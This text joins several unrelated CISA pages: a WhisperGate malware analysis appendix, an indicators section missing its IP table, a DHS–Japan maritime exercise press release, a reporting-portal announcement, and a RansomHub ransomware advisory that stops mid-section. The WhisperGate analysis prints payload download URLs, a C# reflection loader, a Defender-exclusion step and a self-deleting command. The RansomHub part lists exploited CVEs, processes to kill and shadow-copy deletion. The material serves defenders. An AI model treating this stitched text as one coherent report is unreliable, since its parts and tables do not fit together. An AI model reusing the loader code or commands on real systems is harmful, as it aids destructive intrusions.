The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.
Version History
September 5, 2024: Initial version.
Appendix A: WhisperGate Malware Analysis
Overview
This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.
Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files, stage1.exe and stage2.exe. WhisperGate has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appears to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg—the malicious payload that is in-memory loaded and performs the destructive capabilities.[18]
Categorization
The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.
Cluster 1
Cluster 1 contained the following files:
hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource, e.g., payload, for stage2.exe)[18]
saint.exe (a downloader, SaintBot, as detailed by CERT-UA)[19]
hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip (means for sending malware in over 35 different zip files via Discord links)[20]
Several Microsoft Word documents with macros that download test01.exe from 3237.site. Once executed, test01.exe downloads load2022.exe from smm2021.net.
Cluster 3
Cluster 3 contained:
hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit 29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.)
asd.exe (likely a development version of stage1.exe)
Behavioral Analysis
Two Windows Portable Executable (PE) files (stage1.exe and stage2.exe) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe) was obtained from a U.S. victim.
stage1.exe
stage1.exe was obtained from the C: path of the Ukrainian victim’s Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.
Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions.
InstallUtil.exe created and executed; files corrupted following execution
C:UsersAppDataLocalTempInstallUtil.exe
Static Analysis
Static analysis was further conducted on two files (stage2.exe, Tbopbh.jpg) to uncover additional malware functionality and attributes.
stage2.exe
Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.
This variant of stage2.exe contained multiple layers of execution:
stage2.exe contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the payload Tbopbh.jpg.
stage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method.
stage2.exe contained logic to load an Assembly object into a Stream object.
stage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.
stage2.exe contained decryption logic that resembled RC4, a C# class produced a base64 string and an encryption class which created a key using the decoded string. The encryption class used encryption logic every 32 bytes to decrypt. Additionally, the XOR functionality occurred using the initialized byte “Array” shown below. The encryption class resembled RC4; it was used every 32 bytes. The base64 string came from a class that contained EazFuscator logic to obfuscate code by eliminating control flow within code, as well as making symbols difficult to analyze:
stage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string:
UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
When the above string was base64 decoded, the system displayed the following PowerShell command: Start-Sleep -s 10
stage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg.
Tbopbh.jpg (payload for stage2.exe variant)
An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:
When viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below.
The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21:
Note: This format annotates action taken by EazFuscator to obfuscate items, making it difficult for malware analysts to review.
Main – ClassLibrary1
u0002
7c8cb5598e724d34384cce7402b11f0e
pc1eOx2WJVV1579235895 –
Ylfwdwgmpilzyaph
78c855a088924e92a7f60d661c3d1845
stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:
using System.Reflection; string path = "Frkmlkdkdubkznbkmcf.dll"; string fqpn = Path.GetFullPath(path); Assembly assembly = Assembly.LoadFile(fqpn); Type type = assembly.GetType("ClassLibrary1.Main"); type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);
The following application configuration accompanied the above code block to allow loading from remote sources:
Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs wrote to the Windows %TEMP% directory and has the following attributes, as listed in Table 22 below.
The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C: drive from Windows Defender’s security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:
GNU linker Id (GNU Binutils)(2.28)[Console32,console]
The reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself: cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q “%s”. Waqybg is known as WhisperKill—a malware downloaded by WhisperGate that destroys files with specific extensions.[19],[21]
The following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the “wcscmp” C function logic (a string compare function). The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted file.
stage2.exe and its respective payload, Tbopbh.jpg, served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.
Figure 1: stage2.exe Execution Process Template
Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll.
Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. The hashes in Table 26 represent both byte orders.
Table 26: Files Located in Discord Cluster 1
Filename
MD5 (Reversed)
MD5 (Functional)
Afgyyppsysmtddhvhhaw.dll
d034fe4c71b16b6d331886c24fef2751
4074798a621232dc448b65db7b1fdd66
Avbbwys.dll
422437f326b8dbe30cc5f103bde31f26
7f84263fd24f783ff72d5ae91011b558
Azkebvoyswvjnrpmn.dll
562c337b8caca330da2ea6ae07ee5db6
f73d203bdf924658fd6edf3444c93a50
Budoejokuqbge.dll
58e879213d81333b628434ba4aeb2751
08dfebc04eb61c9a6d87b6524c1c0f2e
Bwqdffttejlkeqe.dll
1c85c0d044ac837e8939564afac1eb32
8633bd2bbbb5da22c3f8751150186c42
Bxqbsyxfkjzmhdtfceoak.dll
7234da8ceafbe6586469f18c03cc1832
5f4df6dd8e644d59eaf182e500b5e7bf
Clsrncpbaucrabuobcpale.dll
618d62dd95fd9aeb855fe2ef1403dce5
955e4c198ee58e40fe92cb74ceefdf00
Cpdvzvzyghy.dll
d40195a444526eafb0db56d95bf8655d
a905d620717f75751aa94ceb88995dbc
Ctiktdfyauejxfak.dll
d06761b2cff86035a4838110ed6ab622
2ca6bcf16ee4293a771a1cf7b7b9ee49
Czxhayyankwsp.dll
59da31da4db1aa5f9a5c7c0c151422c8
de1bf141976776becd376a0dac400df6
Djpajq.dll
de1f9d1f0336ddcff832ad3900acd2f1
974e7c0b3660fbf18f29eac059f85ac0
Dmdtflkcgebf.dll
394e056cb6cb732dfd5e0d45d3dae938
4d8343c40be53d6521244fe74393d937
Ejcpaujkmvjndgqznimmkgd.dll
b7c1a8d39f46eaf52be90e24565dd6b0
7a70d5fbbafe3454b76e3ad2f009618f
Encuutwvdqbxlxh.dll
2b39eab325906b0a3ab7e584c3d67349
df4f856f783d23fb01af1e0e64bc0e20
Esalfjyraquwfxcgufwzip.dll
80f0ee332a452172533ad8863bb3bc63
f4f4e55a00d2f3a433c9e5624285ac1c
Fdgofjdvmmllgsxunb.dll
9345425cf07b4c39a80cd8540e08bfde
eef2363744345741e09fe5380eeb4df3
Fkhzvcuucaprsibp.dll
aecb57e20d2c0b0d9fece2cbcbcc3459
4bce4831b1dd71f19c55b3e3b5e99856
Fkthhyexkr.dll
58dc7c9577ff90a046359ca255c0c9f4
19cb20c4e7dbfe15c1aa284752d0fecb
Fqattuyxknkhv.dll
5c9e2195d10375b746b6717fdb47b5b9
2b5f159f022109a8de1bc5dd9e3138a0
Fqyubbzbubsge.dll
afbb9459d4a0f60d7ffb3b3532d11bc2
8d3d4d702ba6b4be2766a41bfe5ff76e
Frkmlkdkdubkznbkmcf.dll
b3370eb3c5ef6c536195b3bea0120929
e61518ae9454a563b8f842286bbdb87b
Gsiook.dll
a1b509254a0a1daa7e00d279ec974461
0e03103e8110785156105946e48ea9e0
Gutjuhi.dll
791a81f31a8e7090a7d5417451e09efa
fba76f4eb2e7a2eb17193bebe290a198
Hisvswmeswmnqbvzpoxzx.dll
e1a15bc13157134f542cd9c55c742460
c9d1677f4f89b95b41591b23a1dc1a63
Hsoahb.dll
cd62d4a178705b2b90a8babd8613df93
032f5642d4fb2fdd74e6f20a13c57746
Icyjkszdzgoxdfuwptkwxo.dll
f34f60375bebad861a35b7c4bb0fa1c8
a66b3b22a3619f739b197d0d443b700c
Jdfzavlqr.dll
7fe7f33d9b5dbdf3d032d2a10e39f283
8cfef66b390f08bdbfd940922cf51650
Jrdggfjvve.dll
b32e14a9b7de6c92cd16758fa6e23346
1220b580cef1bf22351e271773945d20
Jteieurqgvpgnhw.dll
b85538f665fdb6c8d9a74f2df7369832
ffa68749aa3fc6495e2c49b01d964339
Kbuqtmznmodjzvxvwxcvho.dll
869742fb9db71fdb66f00528fe2966ec
5b884f15dc9b072d7bbad9ec2b249f38
Kdmvyizz.dll
2128361d8aaae1225d50c9add32006a1
9152c9de57b5647ee4ab3dff551dc8dd
Kfxghcmg.dll
56e0446a6d7175a0d09110bc483ddbed
fc418fdda06ce5982153766dcefb71d9
Krewcizfplntbwcqawfhtfpd.dll
6a4fca88ee36fecc5113e188cc39d25c
5c3b0040e2dece6e17093ae607b79044
Lsurhpmpyewhv.dll
143594597130e301499e5940a5fb798a
911c7e82f32f78577dcd725a7adb114d
Mbkzrkfasxgxtzhgpgsehip.dll
993f01861aff306df44e6475f7886f37
e4634ef9bfe7b598b857ad997445b239
Mhnovdgzzidqx.dll
64b9feeccf6c183b9f7138f8fc53acbb
7e0c42d33921a89724424f17c97037bd
Mlfampnfnmjvjnahkrawwqd.dll
ddec2d79f460a881849037336ba8968f
d973210977957209f255b58eb1715b12
Mppveiyannobrcdlkd.dll
9606b4720a0e73ef1f00505a11aab2f7
0adc2530cf348c0a3d53a680291a3d67
Mzhyeemgqbmamubqn.dll
f772f5c65d65412f61ef5f2660e33ceb
f8ffd1eab6223e31b15d0fd6c3c0472e
Nbbudwt.dll
875f9200b49db08c33962b0a6bd05ab9
2e035360971a817b854d7d5a2b008717
Nhqcfzagulwaw.dll
fa97dbe84ce7717b754795fa89f13dce
601c12596dfea84c2113ae5ee59a52ec
Nlzhpvuzzoycqnnpl.dll
d8c04ecd646a1f8537a59f63518ef3c6
47f4534da421daf8089cf34d53f6bb6e
Noubvdigjlwsnqiylzgikkk.dll
3bcff990faacbebb8fb470dfe03e2543
683546b9171a1ea284a96d1b45d1d823
Nvxwbzciqarteyuz.dll
c265188fdadddb648629e8060601dca7
af85885a74cfe099676af542dcdc5741
Nykfvwmchighqwcguabvgq.dll
8a2ba7f9cb6f65edf65dbe579907551e
673586594242d99ab02118595e457297
Ofgdwttnmqibnmpqx.dll
9657c2ef6ed5229740b125df9ca6c915
0dc5ac12f7690db15c99eaabc11b129c
Ohtvepefcjnchrrasokn.dll
a5494ffd9efb7c3df59c527076a05e62
e2cc52273d56ed66c800a726760c1ed0
Olkscszculdbzvco.dll
85afdef18d65b0518d709a5a324ea57a
77675a24040f10c85112d9a219d5f1c7
Onkwzkpfuqazvali.dll
da4d81f9ef3b25ea09f34481d923dd9d
cc4a9db6f250114e26d8d9ba6ab46bc9
Opaqwrazeyyilbbjlkf.dll
0e6374042b33d78329149a6189a7cb46
1934e2ebc64d41e37ef53ea0c075e974
Owxtabfdqhkaahhwsgkatuu.dll
d33f608f561096be24cba91797e0da2f
332b7f6662e28e3577bd1b269904b940
Poezcjhvkzgmnyqljpbte.dll
32db8abce1618e60441f5c7cf4be0d22
2b2509c6ee46d6327f2f1c9a75122d15
Rvyqctymumtudroyae.dll
dd2431b1f858b4ca14a4ea05fb8c4a06
9b2924c727aa3a061906321a66c9050c
Sutragevr.dll
7d3b529db1bd896d9fd877b85cafdc64
de276cf07ccffa18d7ffc35281bca910
Sxkdxclqmxnmjgedhgagl.dll
6e1394938c2fecad2d4f5b3bcf357ec0
d6b41747cb035c4c2b08790cd57f0626
Tosyxesxgrzyb.dll
99305ce01cc2d0f58cd226efb2de893f
6859fe5a3eead00a563cd93efcc6ea96
Tpmnkauftdydomyz.dll
6c152774f6894407075e6f0a2859bbae
981160dee6cd25fb181e54eca7ff7c22
Tptjtwfhpsjfksqoajt.dll
343b140977b3f9b227e7e5f82b0fadb5
95cf2a5a24b0d33d621bb8995d5826bc
Tsgblplhdwwj.dll
54a9fa9eb337a3b5ca7b0fa4553e439d
cee5acbfef7e76f52f40b8ae95199c50
Uqhznlcagzyoqrbyylnnwn.dll
4c19aeecbfca13b8a199703d8b8284b9
ad0ca738aa6c987e4ee1a87ff2b8acd5
Uslrfkxccdyetfdxmaokbhv.dll
dc795cb9290b1bc0b7fb1ce9d6ae7c93
552d9b79cc544fc6c3e8aa204dd00811
Waordspinycera.dll
9935a86108e3ae3f72cd15817601dcc6
5d063eecd894d3d523875bc82ef6f319
Wcfsobntsczz.dll
77aa3f342a0d69fda67c853bcc004d48
d0b00a6c83ce810ec2763af17e8ab1c4
Wpqyhvfnunlabx.dll
03af632aa6f87bf9dd4364ee3b612cbb
9f11e915be5c0d02a3130329cf032a28
Wqwpawlulyrsrjcbvuvddeud.dll
41871fef433d7b4b89fd226fe3a1a2c0
e21fe98cc8866c0eeecf3549ebcec751
Wqxpgvsgvhygmfbziucxcuh.dll
246d9f9831b125ea7e6ef21bc4c8a0ca
dea3ae8225913dd98148fc86cfc3bcbe
Xgcpgrxhchgwz.dll
9c695be3703194fdb71c212a0832bcf3
8744cec7547b1e73705c10a264e28e08
Xgkepoc.dll
69e58c5ee69f5e5e8a58f4afdd59adfe
d43446b4a22a597b93b559821ee5ac9b
Xlfthpiq.dll
540ee8e39150c539fea582b0e77be7b0
3fe96ff4a5ef0f5346ce645a2a893597
Xlocky.dll
0a2affa6d895baab087b84e93145da35
246f31c86bbbe7f65c0126cf4a1a947a
Xqblktvxmnxrzwiuqdfxzrd.dll
569c1d31f4c7ec7701d8e4e51b59fe85
5eaa7e812733a5c8cda734fab2f752d5
Xykqrksoqqgyuckfc.dll
09a2d85e809d36bff82bd5ab773980a3
96964aed18f65a7acae632f358a093f6
Yawyjonk.dll
3ccf799ff208981349cee4fb1a1cf88c
4e9c55c6fe25d61ca4394de794546fab
Yrknbt.dll
6154760e602bd71192d93f72fbdb486e
94bf96b76c2a092de8962496ce35deaf
Yvbmuigfihprdxgiirp.dll
b0d0a23766fa64ece9315f37b28bb4c0
1e22d64f263e8ea4b2d37dcd9b7c3012
Ywrovtjimixpmizuln.dll
ca43a241042b5fcc305393765ae18e69
28d571ddb5c04d065dfe1be9604663ba
Zfgdccnwnee.dll
251f3a4757d9e4de0499cc30c0bc00a9
755dac7edd17fbf5b5c449dd06c02e14
Zkuxhxwbvifejn.dll
9d7ab8b0aa669125d9a5adc4f46c56f3
af277ae0fbf6cc20f887696ea4756d46
Zsdflpivel.dll
a9c9c0be8eca3b575c24da0fcf1af1a9
1cac5c0cb8801e8730447023270d8d56
Appendix B: Indicators of Compromise
Table 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.
Table 27: IP Addresses Associated with Unit 29155 Infrastructure
Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.
WASHINGTON – From August 21-22, the U.S. Department of Homeland Security (DHS) and the Government of Japan conducted a successful tabletop exercise focused on enhancing maritime cybersecurity and incident response capabilities. This reflects the continued commitment by the United States and Japan to continue cybersecurity collaboration including on domestic cyber policies, such as those related to the protection maritime critical infrastructure. The exercise simulated a major cyber incident impacting operations at a Japanese port, testing incident response policies and procedures, and fostered conversations between the United States and Japan on how to enhance mutual preparedness for threats to interconnected critical infrastructure.
The collaboration builds upon Secretary Mayorkas’s priority to enhance close cooperation with partners in the Indo-Pacific region with focused discussions on protocols for incident response, information sharing, and the identification of future bilateral cooperation to mitigate current and emerging cyber threats to critical maritime infrastructure. U.S. and Japanese participants discussed protocols for incident response, information sharing, and future bilateral cooperation to more effectively mitigate cyber threats to critical maritime infrastructure. The exercise also allowed DHS and the Ministry of Land, Infrastructure, Transport and Tourism to engage on relevant maritime cybersecurity policies, including President Biden’s February 2024 Executive Order on Amending Regulations Relating to the Safeguarding of Vessels, Harbors, Ports, and Waterfront Facilities of the United States.
“Exercises like these bolster our nation’s capabilities and establish reliable channels for coordination with key international partners,” said Under Secretary for Policy Robert Silvers. “Cyber attacks pose a shared risk, beyond any single nation’s control, making it imperative for the United States and Japan to collaborate in addressing these challenges to thrive in such interconnected environments.”
“Malicious cyber actors recognize ports worldwide possess the same critical vulnerabilities and are increasingly willing to target them,” said Admiral Linda Fagan, Commandant of the U.S. Coast Guard. “Coordinating together to share risk information, improving operational coordination between incident responders, and building our collective capacity to withstand the targeting of port infrastructure is a necessary step to safeguard the global maritime system.”
“Cyber attacks to ports and harbors could potentially disrupt key international logistics functions which serve as a lifeline of Japan, a country surrounded by the sea, affecting both Japan and the United States,” stated Dr. Masahiro Inada, Director General of the Ports and Harbours Bureau, Ministry of Land, Infrastructure, Transport and Tourism. “I intend to share best practices gained through this exercise and continue to promote the reinforcement of cyber security of ports and harbors, while working together with relevant parties.”
“The opportunity to collaborate within the Department and with the Government of Japan was extremely beneficial to building effective partnerships that strengthen maritime systems cybersecurity and resilience,” said CISA’s Executive Assistant Director for Infrastructure Security Dr. David Mussington. “This joint exercise underscores the importance of international planning to ensure we are equipped to respond to cyber threats and reduce risks to global maritime activities.”
This was the second maritime security tabletop exercise that DHS has held this year, following the success of a joint exercise with Indonesian counterparts in June 2024. DHS and Japanese counterparts plan to build off of this exercise by operationalizing lessons learned and each participant will strengthen its cybersecurity measures.
The two days were organized by the Department’s Office of Policy, the Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Coast Guard, with inputs and participation from the Embassy of the United States of America in Tokyo, the Office of Intelligence & Analysis (I&A), and the Supply Chain Resilience Center. On the Japanese side, the Ports and Harbours Bureau of the Ministry of Land, Infrastructure, Transport and Tourism hosted the exercise, with participation from National Center of Incident Readiness and Strategy for Cybersecurity (NISC), Prefectural Police, Port Authorities and others, and National Security Secretariat, the Japan Coast Guard, National Police Agency, additional port stakeholders in observational roles.
CISA Services Portal and Voluntary Cyber Incident Reporting webpage, with resources and frequently asked questions, is now live
WASHINGTON – Today, the Cybersecurity and Infrastructure Security Agency (CISA) announces its cyber incident reporting form moved to the new CISA Services Portal as part of its ongoing effort to improve cyber incident reporting.
The Portal is a secure platform with enhanced functionality for cyber incident reporting, including integration with login.gov credentials. The portal’s enhanced functionality includes the ability to save and update reports, share submitted reports with colleagues or clients for third-party reporting, and search and filter reports. A new collaboration feature allows users to engage in informal discussions with CISA.
“Any organization experiencing a cyber attack or incident should report it – for its own benefit, and to help the broader community. CISA and our government partners have unique resources and tools to aid with response and recovery, but we can’t help if we don’t know about an incident,” said CISA Executive Assistant Director for Cybersecurity Jeff Greene. “Sharing information allows us to work with our full breadth of partners so that the attackers can’t use the same techniques on other victims, and can provide insight into the scale of an adversary’s campaign. CISA is excited to make available our new portal with improved functionality and features for cyber reporting.”
To guide incident reporters through the reporting process, CISA also released a voluntary cyber incident reporting resource. It helps entities understand “who” should report an incident, “why and when” they should report, as well as “what and how to report.” Several resources to reduce cyber risk are also available.
CISA encourages all organizations to take advantage of its new streamlined portal and voluntarily report cyber incidents.
As the nation’s cyber defense agency and national coordinator for critical infrastructure security, the Cybersecurity and Infrastructure Security Agency leads the national effort to understand, manage, and reduce risk to the digital and physical infrastructure Americans rely on every hour of every day.
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.govto see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).
Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.
The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique .onion URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.
The authoring organizations encourage network defenders to implement the recommendations in the Mitigations section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Initial Access
RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [T1566], exploitation of known vulnerabilities [T1190], and password spraying [T1110.003]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [T1588.005]. Exploits based on the following CVEs have been observed:
Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.
A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue.
A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
An improper neutralization of special elements used in an SQL command (SQL injection’) in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as “Windows SMB Remote Code Execution Vulnerability” [T1210].
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).
This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability.
Discovery
RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [T1018][T1046][T1059.001].
Defense Evasion
Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as Windows.exe, left on the user’s desktop (C:Users%USERNAME%Desktop) or downloads (C:Users%USERNAME%Downloads) [T1036]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [T1070]. Affiliates used Windows Management Instrumentation [T1047] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [T1562.001].
Privilege Escalation and Lateral Movement
Following initial access, RansomHub affiliates created user accounts for persistence [T1136], reenabled disabled accounts [T1098], and used Mimikatz [S0002] on Windows systems to gather credentials [T1003] and escalate privileges to SYSTEM [T1068]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [T1021.001], PsExec [S0029], Anydesk [T1219], Connectwise, N-Able, Cobalt Strike [S0154], Metasploit, or other widely used command-and-control (C2) methods.
Data Exfiltration
Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [T1048.002], Amazon AWS S3 buckets/tools [T1537], HTTP POST requests [T1048.003], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.
Encryption
RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [T1486]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes:
“vmms.exe”
“msaccess.exe”
“mspub.exe”
“svchost.exe”
“vmcompute.exe”
“notepad.exe”
“ocautoupds.exe”
“ocomm.exe”
“ocssd.exe”
“oracle.exe”
“onenote.exe”
“outlook.exe”
“powerpnt.exe”
“explorer.exe”
“sql.exe”
“steam.exe”
“synctime.exe”
“vmwp.exe”
“thebat.exe”
“thunderbird.exe”
“visio.exe”
“winword.exe”
“wordpad.exe”
“xfssvccon.exe”
“TeamViewer.exe”
“agntsvc.exe”
“dbsnmp.exe”
“dbeng50.exe”
“encsvc.exe”
The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.
RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.
Figure 1: The first eight bytes are the size of the encrypted file.
The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.
Figure 2: The size of encrypted blocks.
The next two bytes were always seen to be 0x0001.
Figure 3: The next two bytes are always 0x0001.
The next 32 bytes are the public encryption key for the file.
Figure 4: Public encryption key for the file.
The next four bytes are a checksum value.
Figure 5: Checksum value.
The last four bytes are always seen to be the sequence 0x00ABCDEF.
Figure 6: The last four bytes.
The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled How To Restore Your Files.txt is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the vssadmin.exe program to delete volume shadow copies [T1490].
Leveraged Tools
See Table 1 for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.
Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
